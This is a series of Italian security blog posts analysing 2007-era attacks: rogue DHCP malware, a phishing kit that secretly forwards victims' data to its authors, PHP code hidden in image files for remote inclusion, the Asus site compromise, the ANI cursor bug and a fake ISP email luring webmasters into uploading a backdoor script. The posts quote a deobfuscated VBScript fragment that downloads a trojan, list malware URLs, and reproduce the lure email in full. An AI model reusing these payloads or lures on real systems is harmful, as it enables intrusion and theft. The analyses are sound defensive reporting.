Fino ad ora però la tecnica utilizzata per ogni target era sempre differente. CSRF per i router, modifica del file hosts o del registro di Windows e della modifica delle impostazioni di sistema per i Mac. Adesso è stata escogitata un nuovo modo completamente cross-platform utilizzando il protocollo DHCP. Infatti un nuovo malware segnalato da Symantec e ISC, una volta installato su un sistema Windows, manda in esecuzione, sulla medesima macchina, un server DHCP non legittimo (detto anche rogue DHCP) che di fatto si contrappone a quello già esistente, praticamente,  in tutte le LAN domestiche e aziendali. Di fatto questa cosa consente al “rogue DHCP” di far credere ai client che i server DNS da utilizzare siano quelli in possesso degli attaccanti. ISC a tal proposito segnala che i DNS utilizzati da questo ultimo attacco si trovano tra 85.255.112.0 e 85.255.127.255.

L’idea, sicuramente non nuova, ma mai utilizzata da un malware, sfrutta il fatto che il protocollo DHCP non prevede nessun metodo per verificare se la risposta arriva dal server DHCP legittimo o meno. Le richieste dei client girano sulla rete Ethernet in broadcast. In questo modo qualsiasi server DHCP presente sul dominio di broadcast sarà in grado di rispondere. Il primo, in ordine di tempo, che risponderà alle richieste dei client, sarà quello che verrà preso in considerazione.

Dopo questa premessa vorrei passare ai tool che risultano essere utili per scoprire “rogue DHCP” sulla LAN:

TIME: 2008-12-06 15:17:50.200
IP: 192.168.0.1 (XX:XX:XX:XX:XX:XX) > 255.255.255.255 (ff:ff:ff:ff:ff:ff)
OP: 2 (BOOTPREPLY)
HTYPE: 1 (Ethernet)
HLEN: 6
HOPS: 0
XID: a6e51638
SECS: 0
FLAGS: 0
CIADDR: 0.0.0.0
YIADDR: 192.168.0.101
SIADDR: 0.0.0.0
GIADDR: 0.0.0.0
CHADDR: YY:YY:YY:YY:YY:YY:00:00:00:00:00:00:00:00:00:00
SNAME: .
FNAME: .
OPTION:  53 (  1) DHCP message type         5 (DHCPACK)
OPTION:  54 (  4) Server identifier         192.168.0.1
OPTION:  51 (  4) IP address leasetime      86400 (24h)
OPTION:   1 (  4) Subnet mask               255.255.255.0
OPTION:   3 (  4) Routers                   192.168.0.1
OPTION:   6 ( 12) DNS server                85.37.17.55,85.38.28.93
OPTION:  15 ( 22) Domainname                domain_not_set.invalid

(Sono stati sostituiti i mac del server con XX:XX:XX:XX:XX:XX e quello del client con YY:YY:YY:YY:YY:YY)

Questo è un esempio di un DHCPACK mandato da un server DHCP dopo le richieste del client. Come si può notare il server DHCP comunica Gateway e DNS.

Ho trovato alcuni tool interessanti per monitorare richieste e risposte DHCP su una LAN:

• DHCPloc (resurceKit di Windows)
  
• DHCPdump (disponibile nei repository della maggiori distribuzioni Linux)

Dove gli antivirus non arrivano, con qualche riga di script non è difficile gestire gli alert in caso siano rilevati server DHCP non legittimi.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Un gruppo che si fa chiamare Mr-Brain ha rilasciato dei tool, scritti in PHP, utili a chi vuole cimentarsi in truffe a mezzo phishing. Il sito Web del gruppo offre versioni diverse degli script in base al servizio da “impersonare”: eBay, PayPal, Bank of America, ecc..

I tool sono stati scritti in modo da permetterne l’uso a chi di PHP non ne sa niente: è necessario solamente inserire la propria e-mail per ricevere i dati sensibili inseriti da ogni vittima.

I tool-kit possono essere scaricati senza sborsare denaro. Quest’ultima caratteristica e l’immediatezza d’uso hanno permesso una larga diffusione nel mondo di phisher in erba, tanto che ne erano già state individuate tracce all’inizio dell’anno.

Chi pensa che i ragazzi di Mr-Brain hanno rilasciato questi script solo per la gloria o per il gusto di sapere che verranno usati per colpire utenti non molto smaliziati sbaglia di grosso. L’idea, simpatica, degli autori è quella di prendersi un equo compenso da ogni copia usata un po come fa la cara e vecchia SIAE.

Questa è la parte di codice che si occupa della raccolta di tutti i dati inseriti dalla vittima per poi inviarli via mail:

Notate niente di strano?

La funzione mail() è ripetuta due volte utilizzando due nomi variabili diversi, anche se solo per la prima lettera.
Il valore della prima variabile, quella con la “s” minuscola è definibile dal phiser, mentre il valore della seconda variabile, quella con la “S” maiuscola, è settato tramite un campo del form di raccolta dati. il valore di tale campo è stato offuscato codificandolo in base64:

<input type=”hidden” name=”Send” value=”<?=base64_decode(“TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=”);?>”>

In questo modo, i dati della vittima, oltre ad essere inoltrati a chi ha personalizzato lo script con la propria e-mail, verranno sempre inviati anche a un indirizzo di proprietà del gruppo Mr-Brain.
Che dire? Forse l’esperienza conta sempre.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Da una indagine compiuta su un campione di 500 PMI italiane del nordest – spiega Mirko Gatto di Yarix – si evidenzia come addirittura il 49% dei casi provenga dalla Cina.

Ma quali categorie di PMI sono incluse nel campione? Cosa è stato fatto sui sistemi, una volta attaccati?
Senza questi dati mi è difficile credere allo spionaggio industriale; magari aziende in settori poco appetibili vengono attaccate quanto aziende molto interessanti per i concorrenti cinesi.

Anche la percentuale di IP cinesi registrati negli attacchi non deve essere sottovalutata. Ma chi assicura che non siano stati usati come testa di ponte?

Tra gli attacchi più utilizzati, segnalati da Yarix, vi sono anche i Cross-site Scripting (XSS). Monitorando l’utilizzo di questi ultimi sul sito vittima, non sarebbe così difficile tracciare il vero intento di un attacco. L’XSS infatti è veicolato dalla “macchina” ma sicuramente il fattore determinante, per una buona riuscita, è quello umano.

In particolare, sul campione di 500 PMI, sono stati registrati 122.500 attacchi nei primi sei mesi del 2007.

Sono abbastanza sicuro che almeno la metà di quegli attacchi era automatizzato o comunque finalizzato alla compromissione della macchina per utilizzi come “Malicious Web Server” o semplice defacement.

Speravo in un report dettagliato, ed invece nemmeno sul sito Yarix, azienda fonte della notizia, si trova niente. Peccato perchè la cosa è molto interessante.

Update: noto con piacere che non sono l’unico a pensarla in questo modo: Attacchi dalla Cina alle PMI?, di Claudio Telmon.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Ovviamente la cosa si è diffusa in rete e c’è chi ha scritto pure un documento sull’argomento, non mi sono soffermato più di tanto sugli esempi ma devo dire che può essere utile per capire quali sono i problemi derivanti da un sistema di upload pubblico.

Nell’esempio di RSnake il codice PHP viene messo in parti più o meno casuali dell’immagine GIF e vengono usati i commenti “/*” e “*/” perchè ci sono stati problemi di parsing con i dati binari che compongono l’immagine stessa. Personalmente ho creato una semplice immagine GIF di 1×1 pixel, in formato GIF89a il quale permette l’uso dei metadati, e ho salvato dentro ad essa un commento che altro non era che del codice PHP:
A questo punto ho rinominato il file in .php ed ho provato a far effettuare il parsing a mod_php sia in versione 4 che 5 e non c’è stato nessun problema. L’unico inconveniente, se così si vuole chiamare è che il parser riconosce solo il codice all’interno di “<?php ?>” quindi tutti i caratteri ASCII che compongono l’immagine saranno mandati direttamente in output:

Se il file GIF rinominato .php viene eseguito senza problemi dal parser PHP vuol dire che se cerco di includere l’immagine originale, con il commento che contiene codice PHP, tramite include() o require() questo verrà eseguito: si possono, quindi, usare file di immagine (GIF, PNG e JPEG) per eseguire codice tramite RFI (Remote File Inclusion). A questo punto un qualsiasi servizio di image hosting come ImageShack, Flickr, Zooomr e tanti altri può trasformarsi inconsapevolmente in un hoster di codice per RFI.
Come già detto, per ospitare codice PHP in una immagine, è possibile utilizzare, oltre al formato GIF, anche JPEG e PNG. Per farlo sarà necessario solamente utilizzare i metadati previsti dai due formati.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Questi gli header più significativi:

From: <admin@microsoft.com>
To: xxxxx@xxxxxxxxx.xxx
Subject: Internet Explorer 7.0 Beta

Questi i domini, per ora individuati, che ospitano il file eseguibile:

• httx://accentstaffing.com_/images/update.exe
• httx://mikelike.cd_/update.exe
• httx://xoozee.cd_/update.exe
• httx://merzingo.cd_/update.exe
• httx://endfriends.cd_/update.exe
• httx://netdesks.cd_/update.exe
• httx://pleasedostock.hk_/update.exe
• httx://wordcasts.cd_/update.exe
• httx://abyssrecycling.co.uk_/images/update.exe
• httx://bcweblist.com_/images/update.exe
• httx://actorsandactresses.co.uk_/images/update.exe

(httx e l’underscore dopo il TLD sono stati inseriti per sicurezza)

Il primo nella lista, almeno nelle e-mail che ho ricevuto io, è stato quello più utilizzato. Fortunatamente già molti dei domini nella lista sono stati ripuliti e il link al file eseguibile restituisce un errore HTTP 404.

Il consiglio è quello di bloccare i domini sopra riportati tramite il proprio gateway o proxy di rete, oppure in maniera più semplice aggiungere, sul proprio server mail, dei pattern per il riconoscimento delle e-mail provenienti da “admin@microsoft.com” con oggetto “Internet Explorer 7.0 Beta”.
Per eventuali aggiornamenti rifarsi alla segnalazione dell’ISC.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Tutti gli altri server presentano la home page standard di Asus USA.
Come già detto, i cracker hanno utilizzato un iframe per includere codice JavaScript e VBScript malevolo, ma contrariamente a quanto detto da Kaspersky, esso non sfrutta il bug sui file ANI ma una vulnerabilità in Microsoft Data Access Components corretta con la patch MS06-014.
Ecco come si presenta la parte compromessa della pagina di www.asus.com (click per ingrandire):

La pagina iniettata, ospitata su un Webserver cinese (indirizzo ip 222.73.247.123), contiene del codice JavaScript offuscato, il quale una volta decodificato crea un VBScript appositamente scritto per sfruttare la vulnerabilità su RDS, ne riporto la parte più significativa (ho volutamente modificato http nell’url):
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "hxxp://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
L’immagine PNG richiamata è in realtà un Trojan eseguibile su piattaforme Windows (offuscato) (32bit x86) della famiglia PSW i quali fungono da keylogger e “steal password”.

La cosa grave, a mio avviso, è che a due giorni dalla segnalazione Asus non ha ancora fatto niente per evitare l’infezione dei propri visitatori.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

La pericolosità di questo bug sta nel fatto che un file, di icone animate, creato ad arte può essere inserito in qualsiasi pagina Web o e-mail. Addirittura aprendo una cartella con un file “ani” creato ad arte, a causa del servizio anteprima di Windows, senza bisogno di aprire il file sarà possibile far crashare il processo “explorer”.

Tramite il bollettino di Microsoft si apprende che i vettori di attacco sono Internet Explorer, Outlook Express, Outlook e Windows Mail. Microsoft stessa consiglia di leggere le e-mail in modalità testo semplice (plain text) in Outlook 2002 e successivi e Windows Mail. Attenzione perchè con Windows Mail se si inoltra o si risponde ad una e-mail arrivata, anche se è attiva la modalità testo semplice, il problema non si risolve. Da notare inoltre che per qualsiasi versione di Outlook Express attualmente non esistono workaround.

Per ora Firefox sembra non essere interessato dal problema, anche se in teoria potrebbe esserlo in quanto gestisce i cursori animati tramite le API di Windows.

Benchè il bug sia molto recente sono moltissimi gli exploit pubblici e le varianti utilizzate da gruppi senza scrupolo. Come successo circa un mese fa, alcuni siti compromessi, sono utilizzati per veicolare versioni malevole di exploit sfruttanti la vulnerabilità sui cursori animati. L’ISC ha fornito una lista aggiornata dei domini utilizzati e una regola per Snort, che blocca i file “ani”, sicuramente più efficace del blocco a livello DNS.

Microsoft ha fatto sapere che rilascerà la patch ufficiale domani, 3 Aprile, vista la gravità del problema. La software house di Redmond ci tiene a sottolineare che la path al problema era già stata prevista, grazie alla collaborazione con Determina, per il 10 Aprile.

Esistono due patch non ufficiali per risolvere il bug in questione: una rilasciata da eEye e l’altra da ZIRT. Attenzione però al falso senso di sicurezza, esiste un exploit pubblico che riesce a bypassare i controlli messi in pratica dalla patch di eEye.

In definitiva tutti i sistemi Microsoft Windows basati su NT sono vulnerabili: Windows 2000, Windows XP, Windows 2003 e Windows Vista.

Update: come annunciato Microsoft ha pubblicato la patch. Consiglio di installarla il prima possibile.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Il team, avvertito da un ricercatore, è prontamente intervenuto mandando off-line il server compromesso per una analisi forense la quale ha rilevato, appunto, che solo la versione 2.1.1 della famosa piattaforma di blog è stata modificata. Lo spazio temporale di esposizione sembrerebbe essere lungo: dal 25 Febbraio al 2 Marzo.
I file modificati sono due: wp-includes/theme.php e wp-includes/feed.php.
Per sicurezza i file php all’interno di wp-includes, almeno di configurazioni partiolari, non devono essere richiamati via HTTP. Se si utilizza Apache si possono inserire le seguenti direttive all’interno della cartella wp-includes tramite un .htaccess:
<files *.php>
order allow,deny
deny from all
</files>

E’ caldamente consigliato a chiunque utilizza la versione 2.1.1 di aggiornare alla versione 2.1.2 visti anche i bugfix inseriti nella nuova release.

Tralasciando questo scivolone di WP, è bene valutare la timeline delle release. La versione 2.1 uscita il 22 Gennaio è stata sostituita, il 21 Febbraio, con la versione 2.1.1 che ha risolto circa 30 bug a sua volta, il 2 Marzo è stata rilasciata la versione 2.1.2 che ha corretto alcuni bug minori.
WordPress rappresentando una grande fetta di tutti i blog mondiali dovrebbe prendere più sul serio il test e la sicurezza del codice(si vedano le vulnerabilità scoperte dall’inizio del 2007).

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Il banner incriminato appare per pubblicizzare un link al download di un programma chiamato “PC-Secure”. Tutti i banner e le message box visualizzate inducono l’utente ad installare software malware e spyware.
La finestra, visibile dopo il click sul banner, chiede se si vuole proseguire al download di “PC-Secure” oppure no. Essendo studiato per scopi malevoli anche la pressione di “Cancel” farà avviare un ActiveX ad hoc. Al momento non c’è soluzione al problema, se dovesse apparire il messaggio l’unica soluzione è chiudere le finestre tramite la classica “X”.

I banner in questione non dovrebbero essere visualizzati agli utenti italiani, ma è consigliabile comunque prestare attenzione.

“Pc-Secure” è una variante di WinFixer e ErrorSafe, malware e spyware già conosciuti. Per maggiori informazioni su di essi leggere il bollettino redatto da Symantec. Anche se si tratta di software risalente al 2005 ed ogni anti-virus è in grado di rilevarlo si trovano guide dettagliate per la rimozione manuale.
Per ulteriori dettagli leggere l’articolo originale su Spyware Sucks.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)

Gli attacker prendendo le e-mail di contatto specificate nei WHOIS dei domini spediscono una richiesta, in inglese, che inivta ad caricare sul proprio spazio uno script in php (offuscato) che, secondo quanto scoperto dalle prime indagini, raccoglie informazioni sul sistema, apre una shell e installa un bot IRC scritto in Perl.

Solitamente il mittente, falsificato, è il proprio ISP, ma sono state rilevate anche varianti con mittente lo US FDIC (Federal Deposit Insurance Corporation).

I file php allegati che sono stati rilevati fin ora sono:

• webguard.php, size 130990 bytes, MD5: 1071956063131f0fd178ace92ab526bb e SHA1: c47dd28e336030e3d940b66e2884aba91124a831
• vprotect.php, size: 156686 bytes, MD5: 43f3c330f6e85943fd4a60c3b89787e2 e SHA1: d58bcb698417cbcf005a0e26e9e962a5097892d9

Quello che segue è una delle varianti della mail:

Dear #Nome dell’ISP# valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file “guard.php” in: “./public_html”

or (for Windows Based servers which use ASP) upload the file “guard.asp” in: “./wwwroot” in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named “guard.zip”
2) Extract file “guard.php”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “Public_html” or “htdocs”
6) Choose “Upload Files”
7) Upload the file “guard.php”
Check its URL too “http://www.yoursite.com/guard.php”, if it is ok

For Windows based websites that use ASP:
1) Download the attachment named “guard.zip”
2) Extract file “guard.asp”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “wwwroot” directory
6) Choose “Upload Files”
7) Upload the file “guard.asp”
Check its URL too “http://www.yoursite.com/guard.asp”, if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards

#Nome dell’ISP#

L’attacco è stato rilevato per la prima volta l’8 Febbraio 2007 (Solid Space – Bluehost) mentre i principali blog ne stanno parlando solo negli utlimi giorni.

© Matteo Carli - Creative Commons 2.5 (by-nc-sa)